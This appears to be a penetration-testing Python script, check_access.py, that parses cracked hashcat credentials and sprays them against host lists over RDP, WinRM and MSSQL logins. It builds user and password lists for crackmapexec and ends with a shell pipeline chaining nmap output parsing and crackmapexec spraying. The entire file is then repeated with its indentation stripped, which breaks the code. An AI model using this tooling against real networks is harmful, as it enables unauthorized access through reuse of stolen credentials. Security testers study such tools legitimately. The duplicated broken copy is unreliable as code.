joeminicucci/check_access.py

## check_access.py
import sys

from impacket_rdpcheck import check_rdp as imp_checkrdp
import impacket_rdpcheck_original as imp_checkrdp_orig
from argparse import ArgumentParser
from pypsrp.client import Client
from impacket import tds
from sys import stdout
from os import path
from cme import crackmapexec
import socket


def parse_hashcat_creds(creds_fd):
    credsDict = dict()
    with open(creds_fd, 'r') as creds_file:
        line = creds_file.readline()
        while line:
            credLine = line.split(':')
            username = str(credLine[0])
            password = str(credLine[-1].strip())
            domain = str(credLine[2].strip())
            credsDict[(domain, username)] = password
            line = creds_file.readline()
            # print ('username: ' + username + 'password' + password)
    return credsDict


def parse_computers(computers_fd):
    computersList = list()
    with open(computers_fd, 'r') as computers_file:
        lines = computers_file.readlines()
        computersList = [x.split(':')[0].strip() for x in lines]
    return computersList


def checkRdp(creds_dict, computers):
    maxTimeouts = 100000
    with open(path.join(options.output, 'rdp_success.txt'), 'w+') as outputFile:
        for computer in computers:
            timeouts = 0
            for domain, username in creds_dict.keys():
                print('[RDP] CHECK %s\\%s for %s' % (domain, username, computer))
                if timeouts <= maxTimeouts:
                    try:
                        # if imp_checkrdp(computer, username, creds_dict[domain, username], domain):
                        sys.argv = ['impacket_rdpcheck_original', '\'%s/%s:%s@%s\'' % (domain,username,creds_dict[domain,username],computer)]
                        # if imp_checkrdp_orig(computer, username, creds_dict[domain, username], domain):
                        if imp_checkrdp_orig.main():
                            print('[RDP] SUCCESS %s\\%s for %s' % (domain, username, computer))
                            outputFile.write('%s\\%s@%s' % (domain, username, computer))
                    except TimeoutError:
                        timeouts += 1
                        print('[RDP] FAIL TIMEOUT %s\\%s@%s' % (domain, username, computer))
                        continue
                    except Exception as e:
                        print('[RDP] FAIL %s\\%s@%s %s' % (domain, username, computer, e))
                        continue


def checkWinrm(creds_dict, computers):
    with open(path.join(options.output, 'winrm_success.txt'), 'w+') as outputFile:
        for computer in computers:
            timeouts = 0
            for domain, username in creds_dict.keys():
                print('[WINRM] CHECK %s\\%s for %s' % (domain, username, computer))
                try:
                    # if cme.protocols.winrm.winrm.plaintext_login(domain,username,creds_dict[domain, username]):
                    if winrm_plaintext_login(computer, domain, username, creds_dict[domain, username]):
                        print('[WINRM] SUCCESS %s\\%s for %s' % (domain, username, computer))
                        outputFile.write('%s\\%s@%s' % (domain, username, computer))
                except TimeoutError:
                    timeouts += 1
                    continue


def checkMssql(creds_dict, computers):
    with open(path.join(options.output, 'mssql_success.txt'), 'w+') as outputFile:
        for computer in computers:
            timeouts = 0
            for domain, username in creds_dict.keys():
                print('[MSSQL] CHECK %s\\%s for %s' % (domain, username, computer))
                try:
                    if mssql_plaintext_login(computer, domain, username, creds_dict[domain, username]):
                        print('[MSSQL] SUCCESS %s\\%s for %s' % (domain, username, computer))
                        outputFile.write('%s\\%s@%s' % (domain, username, computer))
                except TimeoutError:
                    timeouts += 1
                    continue


def mssql_plaintext_login(host, domain, username, password):
    conn = None
    try:
        conn = tds.MSSQL(host, 1433, rowsPrinter=stdout)
        conn.connect()

        res = conn.login(None, username, password, domain, None, False)
        if res is not True:
            conn.printReplies()
            print('[MSSQL] FAIL %s\\%s@%s' % (domain, username, host))
            return False

        print('[MSSQL] SUCCESS %s\\%s for %s' % (domain, username, host))
        return True
    except Exception as e:
        print('[MSSQL] FAIL %s\\%s@%s %s' % (domain, username, host, e))
        return False


def winrm_plaintext_login(host, domain, username, password):
    try:
        conn = Client(host,
                      auth='ntlm',
                      username=username,
                      password=password,
                      ssl=False)

        conn.execute_ps("hostname")
        return True

    except Exception as e:
        print('[WINRM] FAIL %s\\%s@%s %s' % (domain, username, host, e))
        return False

def createUserlist(creds_dict):
    with open(path.join(options.output, 'userlist.txt'), 'w') as outputFile:
        for domain, username in creds_dict.keys():
            outputFile.write('%s\\%s\n' % (domain, username))

def createPasswordlist(creds_dict):
    with open(path.join(options.output, 'passlist.txt'), 'w') as outputFile:
        for domain, username in creds_dict.keys():
                outputFile.write('%s\n' % (creds_dict[domain, username]))

# def checkRdpMock(creds_dict):
#     check_rdp()

if __name__ == '__main__':
    parser = ArgumentParser(
        description='Check access on commonly accessed services with domain creds')
    parser.add_argument('--hashcat-file', '-f', type=str, required=True,
                        help='Hashcat output file', dest='hashcat_file')
    # parser.add_argument('--domain', '-d', type=str, required=True,
    #                     help = 'domain to check for access', dest = 'domain')
    parser.add_argument('--computer-list', '-c', type=str, required=True,
                        help='domain to check for access', dest='computers')
    parser.add_argument('--output-file', '-o', type=str, required=True,
                        help='Output file for successful connections', dest='output')
    parser.add_argument("--rdp", "-r", action='store_true', help='authenticate RDP with input file', dest='rdp')
    parser.add_argument("--winrm", "-w", action='store_true', help='authenticate winrm with input file', dest='winrm')
    parser.add_argument("--mssql", "-m", action='store_true', help='authenticate mssql with input file', dest='mssql')
    parser.add_argument("--create-userlist", "-u", action='store_true',
                        help='create domain qualified userlist & password list for crackmap', dest='userlist')

    options = parser.parse_args()
    creds_dict = parse_hashcat_creds(options.hashcat_file)
    computers = parse_computers(options.computers)

    if options.userlist:
        createUserlist(creds_dict)
        createPasswordlist(creds_dict)
    # if options.rdp:
    #     checkRdp(creds_dict, computers)
    if options.winrm:
        checkWinrm(creds_dict, computers)
    if options.mssql:
        checkMssql(creds_dict, computers)

    #todo crackmap spray
    sys.argv = ['crackmapexec','smb', '<ip>']
    crackmapexec.main()
'''
./nmap-parse-output ~/outputs/speculative_sYn.xml include-ports 139,445 | ./nmap-parse-output - hosts | cut -d ':' -f1 | sort -u > ~/outputs/smb.txt && \
./nmap-parse-output ~/outputs/speculative_sYn.xml service ms-sql-s | cut -d ':' -f1 | sort -u > ~/outputs/mssql.txt &&\
./nmap-parse-output ~/outputs/speculative_sYn.xml include-ports 5985,5986 | ./nmap-parse-output - hosts | cut -d ':' -f1 | sort -u > ~/outputs/winrm.txt &&\
./nmap-parse-output ~/outputs/speculative_sYn.xml service ms-wbt-server | cut -d ':' -f1 | sort -u > ~/outputs/rdp.txt &&\
./<this_file> -f ~/outputs/hashcat_output.txt -c ~/outputs/rdp.txt -o C:\\Users\\root\PycharmProjects\crackd_check\ -u -r &&\
crackmapexec smb ~/outputs/smb.txt ~/outputs/userlist.txt -p ~/outputs/passlist.txt --no-bruteforce &&\
crackmapexec mssql ~/outputs/mssql.txt ~/outputs/userlist.txt -p ~/outputs/passlist.txt --no-bruteforce &&\
crackmapexec winrm ~/outputs/winrm.txt ~/outputs/userlist.txt -p ~/outputs/passlist.txt --no-bruteforce
'''
	import sys

	from impacket_rdpcheck import check_rdp as imp_checkrdp
	import impacket_rdpcheck_original as imp_checkrdp_orig
	from argparse import ArgumentParser
	from pypsrp.client import Client
	from impacket import tds
	from sys import stdout
	from os import path
	from cme import crackmapexec
	import socket


	def parse_hashcat_creds(creds_fd):
	credsDict = dict()
	with open(creds_fd, 'r') as creds_file:
	line = creds_file.readline()
	while line:
	credLine = line.split(':')
	username = str(credLine[0])
	password = str(credLine[-1].strip())
	domain = str(credLine[2].strip())
	credsDict[(domain, username)] = password
	line = creds_file.readline()
	# print ('username: ' + username + 'password' + password)
	return credsDict


	def parse_computers(computers_fd):
	computersList = list()
	with open(computers_fd, 'r') as computers_file:
	lines = computers_file.readlines()
	computersList = [x.split(':')[0].strip() for x in lines]
	return computersList


	def checkRdp(creds_dict, computers):
	maxTimeouts = 100000
	with open(path.join(options.output, 'rdp_success.txt'), 'w+') as outputFile:
	for computer in computers:
	timeouts = 0
	for domain, username in creds_dict.keys():
	print('[RDP] CHECK %s\\%s for %s' % (domain, username, computer))
	if timeouts <= maxTimeouts:
	try:
	# if imp_checkrdp(computer, username, creds_dict[domain, username], domain):
	sys.argv = ['impacket_rdpcheck_original', '\'%s/%s:%s@%s\'' % (domain,username,creds_dict[domain,username],computer)]
	# if imp_checkrdp_orig(computer, username, creds_dict[domain, username], domain):
	if imp_checkrdp_orig.main():
	print('[RDP] SUCCESS %s\\%s for %s' % (domain, username, computer))
	outputFile.write('%s\\%s@%s' % (domain, username, computer))
	except TimeoutError:
	timeouts += 1
	print('[RDP] FAIL TIMEOUT %s\\%s@%s' % (domain, username, computer))
	continue
	except Exception as e:
	print('[RDP] FAIL %s\\%s@%s %s' % (domain, username, computer, e))
	continue


	def checkWinrm(creds_dict, computers):
	with open(path.join(options.output, 'winrm_success.txt'), 'w+') as outputFile:
	for computer in computers:
	timeouts = 0
	for domain, username in creds_dict.keys():
	print('[WINRM] CHECK %s\\%s for %s' % (domain, username, computer))
	try:
	# if cme.protocols.winrm.winrm.plaintext_login(domain,username,creds_dict[domain, username]):
	if winrm_plaintext_login(computer, domain, username, creds_dict[domain, username]):
	print('[WINRM] SUCCESS %s\\%s for %s' % (domain, username, computer))
	outputFile.write('%s\\%s@%s' % (domain, username, computer))
	except TimeoutError:
	timeouts += 1
	continue


	def checkMssql(creds_dict, computers):
	with open(path.join(options.output, 'mssql_success.txt'), 'w+') as outputFile:
	for computer in computers:
	timeouts = 0
	for domain, username in creds_dict.keys():
	print('[MSSQL] CHECK %s\\%s for %s' % (domain, username, computer))
	try:
	if mssql_plaintext_login(computer, domain, username, creds_dict[domain, username]):
	print('[MSSQL] SUCCESS %s\\%s for %s' % (domain, username, computer))
	outputFile.write('%s\\%s@%s' % (domain, username, computer))
	except TimeoutError:
	timeouts += 1
	continue


	def mssql_plaintext_login(host, domain, username, password):
	conn = None
	try:
	conn = tds.MSSQL(host, 1433, rowsPrinter=stdout)
	conn.connect()

	res = conn.login(None, username, password, domain, None, False)
	if res is not True:
	conn.printReplies()
	print('[MSSQL] FAIL %s\\%s@%s' % (domain, username, host))
	return False

	print('[MSSQL] SUCCESS %s\\%s for %s' % (domain, username, host))
	return True
	except Exception as e:
	print('[MSSQL] FAIL %s\\%s@%s %s' % (domain, username, host, e))
	return False


	def winrm_plaintext_login(host, domain, username, password):
	try:
	conn = Client(host,
	auth='ntlm',
	username=username,
	password=password,
	ssl=False)

	conn.execute_ps("hostname")
	return True

	except Exception as e:
	print('[WINRM] FAIL %s\\%s@%s %s' % (domain, username, host, e))
	return False

	def createUserlist(creds_dict):
	with open(path.join(options.output, 'userlist.txt'), 'w') as outputFile:
	for domain, username in creds_dict.keys():
	outputFile.write('%s\\%s\n' % (domain, username))

	def createPasswordlist(creds_dict):
	with open(path.join(options.output, 'passlist.txt'), 'w') as outputFile:
	for domain, username in creds_dict.keys():
	outputFile.write('%s\n' % (creds_dict[domain, username]))

	# def checkRdpMock(creds_dict):
	# check_rdp()

	if __name__ == '__main__':
	parser = ArgumentParser(
	description='Check access on commonly accessed services with domain creds')
	parser.add_argument('--hashcat-file', '-f', type=str, required=True,
	help='Hashcat output file', dest='hashcat_file')
	# parser.add_argument('--domain', '-d', type=str, required=True,
	# help = 'domain to check for access', dest = 'domain')
	parser.add_argument('--computer-list', '-c', type=str, required=True,
	help='domain to check for access', dest='computers')
	parser.add_argument('--output-file', '-o', type=str, required=True,
	help='Output file for successful connections', dest='output')
	parser.add_argument("--rdp", "-r", action='store_true', help='authenticate RDP with input file', dest='rdp')
	parser.add_argument("--winrm", "-w", action='store_true', help='authenticate winrm with input file', dest='winrm')
	parser.add_argument("--mssql", "-m", action='store_true', help='authenticate mssql with input file', dest='mssql')
	parser.add_argument("--create-userlist", "-u", action='store_true',
	help='create domain qualified userlist & password list for crackmap', dest='userlist')

	options = parser.parse_args()
	creds_dict = parse_hashcat_creds(options.hashcat_file)
	computers = parse_computers(options.computers)

	if options.userlist:
	createUserlist(creds_dict)
	createPasswordlist(creds_dict)
	# if options.rdp:
	# checkRdp(creds_dict, computers)
	if options.winrm:
	checkWinrm(creds_dict, computers)
	if options.mssql:
	checkMssql(creds_dict, computers)

	#todo crackmap spray
	sys.argv = ['crackmapexec','smb', '<ip>']
	crackmapexec.main()
	'''
	./nmap-parse-output ~/outputs/speculative_sYn.xml include-ports 139,445 \| ./nmap-parse-output - hosts \| cut -d ':' -f1 \| sort -u > ~/outputs/smb.txt && \
	./nmap-parse-output ~/outputs/speculative_sYn.xml service ms-sql-s \| cut -d ':' -f1 \| sort -u > ~/outputs/mssql.txt &&\
	./nmap-parse-output ~/outputs/speculative_sYn.xml include-ports 5985,5986 \| ./nmap-parse-output - hosts \| cut -d ':' -f1 \| sort -u > ~/outputs/winrm.txt &&\
	./nmap-parse-output ~/outputs/speculative_sYn.xml service ms-wbt-server \| cut -d ':' -f1 \| sort -u > ~/outputs/rdp.txt &&\
	./<this_file> -f ~/outputs/hashcat_output.txt -c ~/outputs/rdp.txt -o C:\\Users\\root\PycharmProjects\crackd_check\ -u -r &&\
	crackmapexec smb ~/outputs/smb.txt ~/outputs/userlist.txt -p ~/outputs/passlist.txt --no-bruteforce &&\
	crackmapexec mssql ~/outputs/mssql.txt ~/outputs/userlist.txt -p ~/outputs/passlist.txt --no-bruteforce &&\
	crackmapexec winrm ~/outputs/winrm.txt ~/outputs/userlist.txt -p ~/outputs/passlist.txt --no-bruteforce
	'''